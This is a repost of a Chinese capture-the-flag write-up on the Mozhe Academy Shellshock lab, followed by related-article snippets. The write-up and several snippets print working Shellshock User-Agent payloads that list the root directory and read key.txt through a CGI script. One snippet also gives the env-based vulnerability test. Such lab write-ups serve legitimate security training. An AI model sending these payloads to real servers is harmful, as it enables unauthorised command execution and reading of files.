[ 墨者学院 ] 命令执行——Bash漏洞分析溯源

最新推荐文章于 2024-03-07 17:56:07 发布
最新推荐文章于 2024-03-07 17:56:07 发布
阅读量156 收藏
点赞数
原文链接:http://www.cnblogs.com/qtisec/p/11095444.html
版权

0x00.题目描述:

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。

实训目标

1、了解bash;

2、了解Bash远程命令执行漏洞形成原因;

3、了解Bash远程命令执行漏洞利用方法;

解题方向

找到poc.cgi文件

 

0x01.题目分析:

根据题目说明,在网上对Bash远程命令执行漏洞进行了一番学习。

参考连接

freebuf:https://www.freebuf.com/vuls/44994.html

Seebug:https://www.seebug.org/vuldb/ssvid-88877

 

0x02.解题过程

通过网上的资料搜查,发现此漏洞存在的路径多数在网页/cgi-bin/下,结合题目给的提示,打开http://url/cgi-bin/poc.cgi

构造执行语句插入到请求头的User-Agent头里面

User-Agent: () { :;}; echo; /bin/ls /

然后构造执行语句查看key.txt

User-Agent: () { :;}; echo; /bin/cat /key.txt

转载于:https://www.cnblogs.com/qtisec/p/11095444.html

weixin_30535913
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
修复bash漏洞的4.3.30源码包
10-15
鉴于目前绝大部分服务器因为没有注册的yum或者因不通外网等问题导致无法使用yum update -y bash 命令进行漏洞修复,如采用RPM包升级修复漏洞又存在各服务器系统有的是32位有的是64位或者bash的版本不一样导致需要各种版本的RPM包的问题,故整合最新的4.3.30源码包通用。使用方式:解压并进入目录(tar zxvf bash.4.3.30.tar.gz;cd bash.4.3.30)使用root执行以下命令./configure --prefix=/ && make && make install
Bash漏洞分析溯源题解
zr1213159840的博客
01-07 370
这个漏洞是看别人的思路解出来的,因为在打开页面后,我扫描不出来其他东西,惭愧 后台存在一个地址,是http://219.153.49.228:49581/cgi-bin/poc.cgi 访问这个地址 对着地址进行抓包 将user-agent进行修改,修改为() { :;}; echo; /bin/ls / 重放一下看下效果 能看到读取出了目录的内容,我们直接读取key.txt,将user-agent修改为:() { :;}; echo; /bin/cat /key.txt。拿到key ...
学院-Bash漏洞分析溯源
JimWu的博客
09-04 162
Bash漏洞分析溯源 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器、wwwscan 1.打开靶场,根据题目思路找poc.cgi。 2.使用wwwscan扫一下 发现有目录/cgi-bin 3.打开burpsuite,访问/cgi-bin/poc.cgi,截包。 send to repeater,修改user-agent为() { :;}; echo; /bin/ls / ...
360众测靶场题库之23-Bash漏洞分析溯源
zjl12344的博客
03-07 132
360众测靶场题库
检测cgi-bin漏洞存在方法
热门推荐
xiaoshan812613234的专栏
12-25 2万+
bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulnerable' bash -c "echo this is a test", 如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令,可能会得到以下输出: v
者 - Bash漏洞分析溯源
吃肉唐僧的博客
06-30 486
bash代码注入的安全漏洞分析 bash的环境变量 环境变量是操作系统运行shell中的变量,很多程序的运行需要获取系统的环境变量参数。具体赋值格式如下: $ var="hello world" 然后你就可以使用这个变量了,但是只是局部变量,即是当前进程可以用,若当前进程的子进程或者其他进程需要用,需要用到 export将本进程的变量copy到其他进程。丽日...
者靶场 初级:Bash漏洞分析溯源
qq_43233085的博客
01-15 414
者靶场 初级:Bash漏洞分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。 实训目标 1、了解bash; 2、了解Bash远程命令执行漏洞形成原因; 3、了解Bash远程命令执行漏洞利用方法; 解题方向 找到poc.cgi文件 解题步骤 启动靶场,打开链接访问,是一个显示页面。 Bash...
阿里云Linux服务器漏洞修复记录2020/09/24
u010148324的博客
09-24 1393
CVE-2017-7895 Linux kernel NFSv2和NFSv3服务器安全绕过漏洞 yum update kernel yum update kernel-devel yum update kernel-firmware yum update kernel-headers CVE-2017-11176 9.8 Linux kernel 'mq_notify'内存错误引用漏洞 CVE-2017-7542 5.5 Linux kernel 'ip6_find_1stfragopt'函数本地拒绝服务
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
者未必黑——思想汇报 .docx
02-10
者未必黑——思想汇报 .docx
学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
spring IOC实现(者革离)
12-12
该代码主要用于spring IOC的实现(者革离),模拟一个城门叩问的编剧场景
者未必黑.pdf
12-26
者未必黑.pdf
shell shock 执行漏洞分析
sdulibh的专栏
02-24 731
漏洞相关报道: http://www.freebuf.com/news/44805.htmlhttp://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html 测试 在Bash Shell下执行以下代码: env x='() { :;}; ech
Bash漏洞分析溯源
weixin_47493074的博客
10-01 541
Bash漏洞分析溯源
CentOS 6.8普通账户SSH登录提示符异常解决
bigwood99的博客
09-22 733
现象: 使用root创建新账户,用户shell是/bin/bash,同步创建家目录。 登录成功,但是提示符异常。 正常的提示符格式应为:用户名@主机名 路径$ 实际显示:~bash版本号$ 过程: 网上搜索,很多文章说可以通过在家目录下".bashrc"和".bash_profile"文件,编写相关代码来解决。 这两个文件是用户登录后,系统自动搜索,搜索到其中之一后会执行它。 按此方法测试,发现无效。基本可以确定,系统没有去执行这两个文件任意一个。 切换shell,使用usermod.
命令执行漏洞
qq_42307546的博客
01-20 1457
命令执行漏洞也称为rce,当应用调用一些外部程序就会用到一些系统命令的函数,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,就会造成命令执行漏洞 相关函数 system(args)有回显 passthru(args)有c exec(args)回显最后一行-必须echo输出 shell_exec()无回显必须输出 代码分析 <?php /** * Created by runner.han * There is nothing new under the sun */
学院sqlmap Host头注入
07-28
学院SQLMap是一款常用的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。而Host头注入是一种特定类型的SQL注入攻击方法,攻击者通过修改HTTP请求头中的Host字段来执行恶意的SQL查询。 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值